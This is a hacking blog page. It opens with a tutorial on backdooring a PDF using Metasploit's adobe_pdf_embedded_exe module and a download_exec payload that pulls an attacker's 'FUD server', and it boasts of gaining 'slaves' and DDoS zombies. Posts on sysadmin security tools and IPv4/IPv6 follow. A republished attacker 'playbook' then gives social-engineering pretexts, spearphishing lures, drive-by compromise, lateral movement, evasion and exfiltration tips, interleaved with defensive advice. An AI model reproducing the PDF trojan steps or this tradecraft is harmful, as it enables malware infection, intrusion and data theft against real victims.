Blogger Widgets

Wednesday, 30 October 2013

Backdoor PDF #Hacker #Hacking #Exploit #Hacker #Pdf #Backdoor





This tutorial will guide you how to backdoor a PDF. What this basically does is that it will download your server when someone opens your PDF file I am not responsible for what you use this guide for *Giggling* {Try not to infect the entire PDF files on the Internet,some of us love reading} *Smirking*


Tutorial:


Requirements:

-Metasploit, 
-A PDF eBook 
-And a FUD server. 


Metasploit can be downloaded from HERE


Search the web for free eBooks if you don't have any on your e-library

>>Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropbox, Mediafire, 4shared, 2shared

>>And make sure that you have installed Metasploit correctly!



Now we will infect the PDF file


1. Open up Metasploit console


2. Type this in the console: use exploit/windows/fileformat/adobe_pdf_embedded_exe


3. Type this in the console: set payload windows/download_exec


4. Type this in console: set INFILENAME <location of your pdf to infect here>

EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf


5. Type this in console: set url <direct download link to your fud server>

EXAMPLE: set url http://download.com/server.exe


6. Type this in console: Exploit

Now you have infected your PDF file and you will be ready to send it out, when people open the infected PDF file then it will download your server and *BAM* new slave.

(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)

-Ok, that's how you get your zombies,..they may come in handy when you decide to execute a distributed denial of service attack- *Chuckles* "Yeah I was never here, when you get caught: you're on your own" That phrase simply means am not responsible for any trouble,complications or holes you fall into during your adventures-  *Flips & Slides*


-10- System Admin-Tools For Securing Your Network #NetworkAdmin #Networking #Networks #Infosec





System admins are frequently bombarded with security concerns, requests, alerts, news items, “did you see this?!” emails, and more. Keeping up with all the aspects of network security can seem like an overwhelming task, but in this post we’re going to look at ten tools a system admin can use to help secure their network. Some you may be familiar with, like network security software, while others may come as a surprise, like your email client; but all will help you to stay ahead of the bad guys, keep yourself informed of the latest threats, and maintain the security of your network.

1. Network security software

When we talk about network security software, we’re talking about a class of product more than any specific tool, and how important it is for you to have an application or small group of applications that can help you to accomplish most of your tasks.
There are simply too many things for any one admin to do by hand, and network security software applications help to automate the heavy lifting and ensure that you can keep up with the workload. Look for network security software that multitasks. Think about it as a Swiss Army knife of software packages that includes many of the other items on this list.

2. Vulnerability scanner

A good vulnerability scanner is a key part of any toolkit, and should be used by server admins and security engineers alike. The top network security software apps will include a scanner that has a database of the thousands of vulnerabilities that could exist on your network, so that you can quickly, easily and regularly scan your network to ensure you systems are up-to-date, configured properly and secured.

3. Port scanner

A port scanner is another regular tool that should be in your network security software application. Attackers regularly scan your Internet connection looking for ways in and so should you. But you should also scan internally so you can find unauthorized services or misconfigured systems, and to validate your internal firewalls are set up correctly.

4. Patching software

Patching operating systems and third party applications is one of the most important, regularly recurring tasks a sys admin has.
Network security software that can automate this, and handle the hundreds of other applications on your network, is the only realistic way you can keep up with this.

5. Auditing software

Auditing software may strike you as a strange recommendation at first, but consider all those apps you are trying to patch. How can you be sure you have no vulnerabilities on your systems if your users can install anything on your systems?
How are you going to maintain licensing compliance if you don’t know who has installed what from software? Network security software may also include software and hardware inventory components to help you stay informed and secure.

 

6. Secure remote clients

Telnet, older versions of PCAnywhere and several of the web- based remote access apps that are out there all have a common issue - they’re not secure. Use SSH v2 or later for secure access to all CLI- based systems, and the most secure versions of Remote Desktop Protocol to manage Windows boxes.
Using strong encryption, good passwords, lockout policies and, when possible, mutual authentication between client and host, will help to ensure no one sniffs credentials or brute-forces their way into a system. If you have two-factor authentication in your environment, ensure that every system possible uses it to further reduce your risk from unauthorized access.

7. A good network analyzer

Whether you like the open source WireShark, the free Microsoft tool NetMon, or one of the many other commercial network analysis tools, having a good “sniffer” is key to helping secure and analyze systems.
There is simply no way that’s more effective to figure out just what is going on between networked systems than to see the traffic first hand.

8. Network tools

Whenever you are dealing with connections from foreign systems, you will find the need to check network addresses, routes and more. Having good tools like DIG, WHOIS, HOST, TCPING and others close at hand makes network evaluation a breeze.

9. Log parsing software

Securing systems means going through logs; lots of them. Web logs, access logs, system logs, security logs, SNMP logs, syslog logs – the list goes on and on. Having software that can quickly and easily parse through logs is critical. Everyone has their favorite. Some install locally like LogParser, while others run on servers like Splunk. Whichever you prefer, get a good log parser to help wade through what can be millions of entries quickly and easily so you can find events you need to check.

10. Your email client

Knowledge is power, and the best way to amass that knowledge is to stay informed. Whether you subscribe to email bulletins, security alerts, or RSS feeds, your email client can provide you the first indications that something new is out there, and also what you need to do to protect your systems from the threat. Zero day exploits, out of band patches, best practices and more, can all be yours if you simply join the right distribution lists and subscribe to the right lists.
These 10 system admin tools are a great start towards building your toolkit for security. Network security software plays a major role in this toolkit, which you supplement with other tools and the information you need to maintain a secure environment.

Friday, 25 October 2013

The Difference between IPv6 and IPv4 #Networking #Networks #Internet



What is Internet Protocol -- IP?
IP (short for Internet Protocol) specifies the technical format of packets and the addressing scheme for computers to communicate over a network. Most networks combine
IP with a higher-level protocol called Transmission Control Protocol (TCP), which establishes a virtual connection between a destination and a source.
IP by itself can be compared to something like the postal system. It allows you to address a package and drop it in the system, but there's no direct link between you and the recipient. TCP/IP, on the other hand, establishes a connection between two hosts so that they can send messages back and forth for a period of time.
There are currently two version of Internet Protocol (IP): IPv4 and a new version called IPv6. IPv6 is an evolutionary upgrade to the Internet Protocol. IPv6 will coexist with the older IPv4 for some time.

What is IPv4 -- Internet Protocol Version 4?
IPv4 (Internet Protocol Version 4) is the fourth revision of the Internet Protocol (IP) used to identify devices on a network through an addressing system. The Internet Protocol is designed for use in interconnected systems of packet- switched computer communication networks (see RFC:791).
IPv4 is the most widely deployed Internet protocol used to connect devices to the Internet. IPv4 uses a 32-bit address scheme allowing for a total of 2^32 addresses (just over 4 billion addresses). With the growth of the Internet it is expected that the number of unused IPv4 addresses will eventually run out because every device – including computers, smartphones and game consoles -- that connects to the Internet requires an address.
A new Internet addressing system Internet Protocol version 6 (IPv6) is being deployed to fulfill the need for more Internet addresses.

What is IPv6 -- Internet Protocol Version 6?
IPv6 (Internet Protocol Version 6) is also called IPng (Internet Protocol next generation) and it is the newest version of the Internet Protocol (IP) reviewed in the IETF standards committees to replace the current version of IPv4 (Internet Protocol Version 4).
IPv6 is the successor to Internet Protocol Version 4 (IPv4). It was designed as an evolutionary upgrade to the Internet Protocol and will, in fact, coexist with the older IPv4 for some time. IPv6 is designed to allow the Internet to grow steadily, both in terms of the number of hosts connected and the total amount of data traffic transmitted.
IPv6 is often referred to as the "next generation" Internet standard and has been under development now since the mid-1990s. IPv6 was born out of concern that the demand for IP addresses would exceed the available supply.
While increasing the pool of addresses is one of the most often- talked about benefit of IPv6, there are other important technological changes in IPv6 that will improve the IP protocol:
1)     No more NAT (Network Address Translation)
2)   Auto-configuration No more private address collisions
3)    Better multicast routing
4)   Simpler header format
5)    Simplified, more efficient routing
6)   True quality of service (QoS), also called "flow labeling"
7)    Built-in authentication and privacy support
8)   Flexible options and extensions
9)   Easier administration (say good-bye to DHCP)


The Difference between IPv6 and IPv4 IP Addresses
An IP address is binary numbers but can be stored as text for human readers. For example, a 32-bit numeric address (IPv4) is written in decimal as four numbers separated by periods. Each number can be zero to 255. For example, 1.160.10.240 could be an IP address.
IPv6 addresses are 128-bit IP address written in hexadecimal and separated by colons. An example IPv6 address could be written like this: 3ffe:1900:4545:3:200:f8ff:fe21:67c

Tuesday, 22 October 2013

Inside A Hacker's Playbook #BlackHat vs #WhiteHat #Hacker #Hacking #Infosec #Security #InternetSecurity




Inside A Hacker's Playbook:Ten Targeted Techniques That Will Break Your Security
{Click Here For The eBook-Password's "ryaandavis.blogspot.com" For reading later/referrals}
"If You Know How To Hack, You Know How To Protect"


Targeted attacks are successful because they are stealthy, specific and disarmingly personal. If they do it right, advanced attackers can quietly infiltrate a network and steal data or information at will for months or even years. Learn how to stop them by taking a page from their playbook— literally. This post presents a never-before-seen copy of an advanced attacker’s technique manual. Use it well to design security that counters their plays perfectly.

A Playbook On Profiting From Targeted Attacks

Before we tackle the finer techniques of building a money-making cyber scam, let’s talk a little about the basics of this gig, shall we?
First of all here’s what we are not trying to do. We’re not trying to blanket the internet with malicious V1agrow spam or mass SQL inject a zillion websites.
We’re narrowing our work down to a specific company or industry based on vulnerability opportunities that we scare up. The broadest we’ll get is hitting a range of companies vulnerable to one precise vulnerability — either never discovered by security researchers or just recently patched by a vendor.
Do it right and you’ll get your hands on huge caches of valuable customer data, and maybe even hit the jackpot with the target’s most important intellectual property. With that, you can blackmail people or sell to competitors — or even to nation states.
You won’t just be buying a new Ferrari.
You’ll be buying a fleet of ‘em.


 

 

Know Your Adversary

With a little bit of research, some crafty writing and the right technology, crooks make a good living running targeted attacks to steal corporate and government data. The more we can learn about their techniques, the better we can counter them.
As we sneak a look at each of the plays inside this bad guy (BlackHat) instruction manual, let’s look for ways to turn this inside knowledge on its head. This post will also offer advice on how to block each attack technique (WhiteHat)

BLACKHAT {Section}


Play 1: Staging Your Attack

Let’s get to easy money! Most times, there are five stages to a really gnarly targeted attack:
a)     Research: Start by doing recon on the anticipated target. Dig for publicly available information and socially engineer your way to exploitable info about their IT systems
b)     Intrude: Use that information to find the right employee to spearphish and the right vulnerability to target with your malicious payload—once the bait’s taken you’ll have your initial toehold in the target’s network
c)     Propagate: When you pwn one machine, use its network connections to spread malware onto other machines so even if you’re detected in one place you’ve got control of other machines
d)     Infect: Once you get the lay of the land through your different connections, install more tools to really start to steal and aggregate data
e)     Exfiltrate: Finally, you’ve got to get all that data out of there. Among other options, public web traffic works well

WHITEHAT {Section}


Step one in the fight against targeted attacks is developing executive awareness that these attacks really are happening. Because these attacks are designed precisely to avoid detection, it’s easy to pretend you’re not being targeted or attacked. But chances are you may already be compromised.

Facts

76% of breached organizations needed someone else to tell them they'd been compromised
48% were told by regulatory bodies
25% by law enforcement
1% by the public
2% by a third party

BLACKHAT {Section}



Play 2: Specialize And Outsource

It’s not what you know, it’s who you know. Put together your own little mafia with specialists who work together to keep your multi-step campaigns running. Just like cave men split labor into hunting and gathering, you just have to break it up into hacking and scamming.
Build the team however you like. Hire people, outsource to malware kit vendors, even work in an equal partnership.
Just remember what they say about honor among thieves…
Just think: no n00bs allowed. If they can’t spell or find the caps lock, or code better than your average script kiddie can, its hasta la vista, baby.


Play 3: Scale Your Attacks

Once you get together that A-team, you’re going to milk every vulnerability dry.
Developed or bought an exploit for a new vulnerability in some sorry old company’s retail point of sale (POS) system? Maybe it's for some small-time grocery store in San Francisco, but then maybe that same exact vulnerability and system configuration is going to work in POS machines at other franchises of the same brand.
Then, son, your meal-ticket is punched. You’ll steal ten times the data but only really do the work to break into one location.

WHITEHAT {Section}

The FBI's List of Cyber Crime Specialties

Targeted attackers are building a business around stealing from your business.
Just as you’d dedicate a lot of specialized employees and vendors to solving your business problem, they’re sourcing skills necessary to crack your defenses. Here are the top five out of 10 common specialties named by the FBI:

Coders: write malware, exploits and data theft tools
Vendors: trade and sell stolen data, malware kits, footprints into compromised networks
Criminal IT Guys: Maintain criminal IT infrastructure like servers and bullet-proof ISPs
Hackers: seek and exploit application, system and network vulnerabilities
Fraudsters: create and execute social engineering ploys like phishing and domain squatting
*********************************************************************
In order to stay a step ahead of the attackers, you’ve got to start thinking like them. One key way to do that is to hire penetration testers to barrage your systems with the same type of techniques the bad guys use. Doing so can help you find widespread vulnerabilities like the POS example highlighted above.

Facts

>1/3 More than a third of data breach investigations occur within franchise businesses

 

BLACKHAT {Section}


Play 4: Play The Player, Not The Game

There’s a good chance your target’s employees will be oh-so-helpful without even knowing it. They’ll give you information, help you upload malware on their machine and even hold the door open for you if you need to sneak into a building. These peeps should be your best friends during the first two stages of attack: research and intrusion.
So work this to your advantage. Here are some tips:
• If you want information-about the org chart, location of a data center, technology they use or whatever—call someone who would know, pretend to be from another department and just ask. Nine times out of ten they’ll freely tell you out of the kindness of their hearts.
• Official-sounding emergencies work every time. Act like you need help to get a ‘mission-critical’ project done or else heads will roll. Works best if you know the name of their boss’ boss.
• If your target employee is high up the food chain and too paranoid to take your bait, try working someone in their entourage. A lot of admins—even temps—are sitting at workstations that can access the same systems the boss’ computers are hooked into.
• Congrats—you just got a job in HR. Pretend to be a recruiter. In this market, people’s judgment tends to get clouded if they think there’s a new job on the horizon.
• Depending on how much you’ve got riding on this attack, you may even invest in a little in-person social engineering. Put on a delivery uniform, bring some flowers and see if someone will let you in the building.

WHITEHAT {Section}


Your employees typically play a big role in a targeted attack and their response to advanced attackers’ probes have the potential to make or break your organization’s chances of keeping the bad guys at bay. In spite of that, industry estimates show consistently that as few as a quarter to a third of employees today are ever trained on how to respond to these social engineering ploys.
Employee training can make it much harder for targeted attacks to ever take shape—an adversary who can’t gather the right information will find it imminently more difficult to customize an attack.

Facts

48% of large companies have experienced 25 or more social engineering attacks in the past two years1
70% of young workers regularly ignore IT policies2

30% of large companies said social engineering cost them an average of $100,000 per
incident3
Source:
1)     www.securingthehuman.org/blog/2011/09/22/ justifying-your-awareness-program-with-social-engineering-survey
2)     www.eweek.com/c/a/Security/Younger-Employees- Ignore-IT-Policies-Dont-Think-About-Security-Says-Cisco-274940/
3)     www.securingthehuman.org/blog/2011/09/22/justifying-your-awareness-program-withsocial-engineering-survey

BLACKHAT {SECTION}

Play 5: Get Social For Better Recon

Sometimes you don’t even need to ask employees for information—they’ll offer it up right on their Twitter feed. Use social media to find out all sorts of sweet Intel. Here’s what you can find out by making a dummy Facebook account and tricking someone into friending it:
• Where they went to high school or college
• Their mother’s maiden name
• Their birthday
• Their dog’s name
• Facts about their job: title, promotions, boss’ name, big projects coming up etc.
All of these are valuable hints at passwords, system challenge question answers and information that are going to grease the skids of your targeted campaign. Even if you don’t friend the person directly, you can potentially dig up info by friending one of THEIR friends. Evil genius, no?
Social media also rules when it comes to building a psych profile on an employee who might turn out to be the kind of tool to help you roll out that first intrusion into a target company. If you know what his or her hobbies are, what teams they root for or any other personal information, you can craft the perfect bait that will get them to visit a site you’ve infected or trick them into opening a malicious document.

 



WHITEHAT {Section}

 

“Elite cybercriminals are tapping into search engines and social networks to help them target specific employees for social-engineering trickery at a wide range of companies, professional firms and government agencies.” — Byron Acohido USA Today
*********************************************************************
According to recent numbers, more than half of enterprises today have seen malware infections rise as a result of employees’ use of social media. And that’s just the tip of the iceberg when it comes to how a persistent attacker will use social media to their advantage. Social media as an intelligence goldmine is an extremely effective method for hackers to start planning their plan. There’s no silver bullet, but a combination of smart social media policies, automated enforcement of these policies and a workforce well-trained in the ways of social engineers can help stem the tide of these attacks.

Facts

32.8% of passwords contain a name in the top 100 girl and boy name lists
16.7% of passwords contain a name on the top 100 dog names list (this is the kind of info people readily give away on their social media feeds)


BLACKHAT {SECTION}

Play 6: Probe For Every Weakness

Why break a window when you’ve got the key for the front door? Look for user credentials at every step of the way.
Goal number two is to find clues about the architecture
of the target company’s IT infrastructure to choose the right malware kit or custom build something that can help you pick the proverbial locks if the keys aren’t lying around. This can be anything from unencrypted password files to lists of company IP addresses to system version information of deployed assets.
There are vulnerabilities in just about every corporate network between here and the moon. If your target company doesn’t have them, chances are a third party vendor or Partner Company with ties into the network probably does.
Should you exploit zero-day vulnerabilities never before discovered by the security industry or vulnerabilities that already have a patch? Uh, yeah. Yeah, you should. If you’re smart, they’ll both play a part in your plans.

Zero-day vulnerabilities rock. But they’re expensive to find and exploit, and known vulnerabilities can be pretty wide open. Most IT departments are too busy to plug their holes with patches.
In situations where you’re seeking very specific information—say manufacturing schematics you’re stealing for a competing company or nation state—and detection isn’t an option, then shelling out for zero-day discovery and exploitation makes sense.
But if it is all about propagating malware in a company you already know (or have a hunch about) has unpatched systems, it makes more sense to take advantage of old vulnerabilities.

WHITEHAT {Section}

DEFENSE:

Hackers might not start with a client-side attack to gain entry into your systems.
Sometimes the first step is to run a SQL injection on your website to find unencrypted password files. Given users’ propensity to reuse passwords, that early work may yield long term access to accounts across many systems.
Strong password management—including enforcement of frequent password changes—is a must to limiting damage in these instances.
On the vulnerability front, organizations have got to do a better job patching their system to limit malicious software’s mojo. Zero-day attacks are a tougher nut to crack and defense against exploitation will depend upon security mechanisms at other security layers to prevent a widespread attack from gaining much ground within the network or exfiltrating data elsewhere.

Facts

42% of organizations have IT staff sharing passwords or access to systems or applications4
48% don't change their privileged passwords within 90 days5
40% or more enterprises have informal or no patch management processes in place7
30% of Apache Tomcat installations with accessible administrative interface have the default credentials
The most common corporate password is Password1, because it just barely meets the minimum complexity requirements of Active Directory for length, capitalization and numerical figures6

Source:
4www.liebsoft.com/Password_Security_Survey/
5www.liebsoft.com/Password_Security_Survey/
6www.trustwave.com/global-security-report
7https://securosis.com/assets/library/main/quant-survey-report-072709.pdf

BLACKHAT {Section}


Play 7: Reinvent Old Web & Email Attacks

Once your crew has done its homework on a target, it’s time to cast your line and wait for a bite. Some of the most effective initial intrusion plays are fundamentally pretty old-school in nature—you’re just phishing people with fake emails, IMs or social media messages to trick them into visiting an infected site or downloading a malicious executable. Now use the information you gathered to custom fit that interaction! Craft a lure that’s believable and build a hook that seems so painless that no one even notices they’ve been landed.
Do it like this:

Example 1: Your hackers just found a killer vulnerability in a stock trading platform but you need control of a machine with access to exploit it. Fortunately for you, it’s football season and there are more than a few football fanatics in the stock broker community. Since most of the companies you’re targeting are based in Manhattan, you use SQL injection to strategically compromise the homepage of two New York NFL teams with malicious code that downloads on visitors’ machines.
To keep pesky reputation-based filters from finding your website infection, you set it up so that it will only interact with machines working within a block of IP addresses originating from Manhattan.

Example 2: You’ve found some middle manager in accounting who’s got access to systems that hold tons of saleable financial and customer data. You chum it up with him on Facebook, convincing him you met him at an accounting professional group conference. Through your friend status you find out his real passion isn’t ledger books but photography. So, you task your hackers and coders to build a basic photography buff website with some hidden drive-by-download payloads. While he looks at tips on digital SLRs, your malicious payload silently loads in the background.

Example 3: You’ve gotten your hands on the organizational chart of a target company and read in a company blog about a strategic new hire of John Smith in the marketing department. You create a Gmail account under the name of the HR manager and use it to write an email that looks like HR blew it and gave everyone info on Smith’s salary and benefits.
They open the attachment, “JohnSmithcompensation.xls,” and bang, curiosity killed the network.

WHITEHAT {Section}

Intel About The Enemy

Advanced attackers are increasingly using strategic web compromises to infect their targets via drive-by download: “The goal is not large scale malware distribution through mass compromises.
Instead the attackers place their exploit code on websites that cater towards a particular set of visitors that they might be interested in.” –Shadowserver
*********************************************************************
The examples named above are just the tip of the iceberg in terms of the type of creativity targeted attacks are employing to personalize their intrusion attempts. Secure web and email gateways are critical to stopping all manifestations of blended email and web attacks.
As Example 1 illustrates, old web filtering technology won't always work—techniques like initiating IP address-specific malware downloads can get around defenses that depend on reputation filtering. This is where advanced technology with real-time code inspection comes into play.

Facts

50% of targeted attacks initially occur through web use
48% of targeted attacks initially occur through e-mail use
2% enter through local devices

BLACKHAT {Section}


Play 8: Think Sideways

One backdoor into a corporate network might be good, but more is always better. If you want to stay on a network for a long time, you’ve got to use that initial client-side pwnage to move sideways through the network.
That way, if your first intrusion is detected and your malware package is eliminated from that machine, you’ll still keep your hands on the steering wheel elsewhere.
The secret? You’ve got to propagate with diversity. You need to use completely different types of payloads on different systems because once one type is found out, odds are they’re going to scan the network looking for everything that looks like that sample. But if you control a bunch of endpoints with different types of malware, they’ll probably never even know they’re still compromised.




WHITEHAT {Section}

Intel About The Enemy

41.2% of the malware uses HTTPS to exfiltrate data
29.4% uses FTP
11.8 % uses SMTP
*********************************************************************
Targeted attacks are so ingenious these days that even with the tools and practices we've suggested already, there's still a chance that some attacks will slip through. Always operate under the assumption that you've already been hacked and utilize practices and technologies that will seek out existing infections, risky security configurations and any suspect file system changes that could be a red flag of infection.

Facts

In 76% of incident response investigations, a third party responsible for system support, development and/or maintenance of business environments introduced the security deficiencies.
88% of targeted malware remains undetected by traditional anti-virus


BLACKHAT {Section}

Play 9: Hide In Plain Sight

Stealth is the name of the game in these targeted attacks. Sometimes you just want to do the old smash and- grab, where you want to get in and out of the network with as much loot as possible or with a very specific piece of information. But generally the most profitable way is to drain the database is a little at a time for a LONG time.
Put some technical noise dampeners on your intrusions.
You don’t want to knock over any expensive vases while you digitally cat burgle the place, do you? Every movement should be planned to avoid setting off any alarms. As you drop tools on systems to aggregate data and control backdoors, here are some tips:
• Avoid self-replicating malware
• Hide malware in system folders and get them to look like common processes
• Make use of webmail accounts to route SSL-encrypted command-and-control traffic to your backdoors
• Use packer utilities to hide malicious binaries
• If you can, store some malware components in the cloud

Play 10: Take Data Quietly

So maybe you’re a l33t spearphisher, you’re wicked good taking over a network and you’ve got a nose like a bloodhound for juicy data. It all amounts to nada if you can’t get the data out of the network. Be patient!
Quiet and slow exfiltration makes it easier to steal larger stores of information without setting off alarms that will shut you down midstream.
Lucky for you, most companies today don’t set up their firewalls to block outbound traffic so you have a lot of options.
Public web traffic can prove to be one of the most efficient ways of slowly leaking data off the network. HTTPS traffic can have added benefit of steering clear of data leak prevention tools by hiding data under cloak of SSL.


WHITEHAT {Section}

Intel About The Enemy

Because the endgame for any targeted attack is to steal data, it only makes sense to depend on data-centric security tools to frustrate adversaries. This can be accomplished by understanding the context of the data and detecting malicious network application traffic that is dragging the data out through application-aware, next generation firewalls.
The use of encryption to hide attacks and theft of data is on the rise. Over 25 percent of all data exfiltrated by attackers is encrypted by cyber criminals. Also critical are encryption techniques that render data useless even if it is exfiltrated.
*********************************************************************
Network monitoring tools have advanced considerably over the years to better find common signs of attacks, but attackers do a good job staying one step ahead of alerting technology. One of the most effective tools organizations have in their struggle to discover malicious activity is system information—but we have to know what to look for. That means correlating small events alerts from across the infrastructure so that one big alarm sounds when enough of them happen at once. It's a specialty of security information and event management (SIEM) tools and the skilled analyst that know how to use them—both indispensible in the fight against targeted attacks.

 " You Have To get Your Hands Dirty To Know How To Keep Them Clean"